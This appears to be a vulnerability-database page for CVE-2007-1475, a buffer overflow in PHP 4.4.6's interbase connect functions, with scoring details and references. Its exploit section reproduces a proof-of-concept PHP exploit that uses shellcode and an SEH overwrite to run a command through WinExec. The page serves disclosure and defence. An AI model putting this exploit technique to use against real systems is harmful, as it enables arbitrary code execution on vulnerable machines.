CVE-2007-1475 : Detail

CVE-2007-1475

0.88%V3
Adjacent Network
2007-03-16
20h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple buffer overflows in the (1) ibase_connect and (2) ibase_pconnect functions in the interbase extension in PHP 4.4.6 and earlier allow context-dependent attackers to execute arbitrary code via a long argument.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.4 AV:A/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 3488

Publication date : 2007-03-14 23h00 +00:00
Author : rgod
EDB Verified : Yes

<?php // PHP <= 4.4.6 ibase_connect() & ibase_pconnect() local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org if (!extension_loaded("interbase")){ die("only works with interbase extension "); } $____scode= "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\xca\x73\xe9\x77". //WinExec "\xff\xd3". "\x31\xc0". "\x50". "\xbb\x5c\xcf\xe9\x77". //ExitProcess "\xff\xd3". "\xe8\xe0\xff\xff\xff". "\x63\x6d\x64". "\x2e". "\x65". "\x78\x65". "\x20\x2f". "\x63\x20". "start notepad & "; $jmp="\xeb\xa1\xff\xeb"; // jmp short $eip="\x86\xa0\xf8\x77"; // call ebx, ntdll.dll $____suntzu=str_repeat("A",2676 - strlen($____scode)); $____suntzu.=str_repeat("\x90",190).$____scode.str_repeat("\x90",10).$jmp.$eip; ibase_connect($____suntzu); ?> # milw0rm.com [2007-03-15]

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 4.4.6

References

https://www.exploit-db.com/exploits/3488
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/22976
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/2439
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/24529
Tags : third-party-advisory, x_refsource_SECUNIA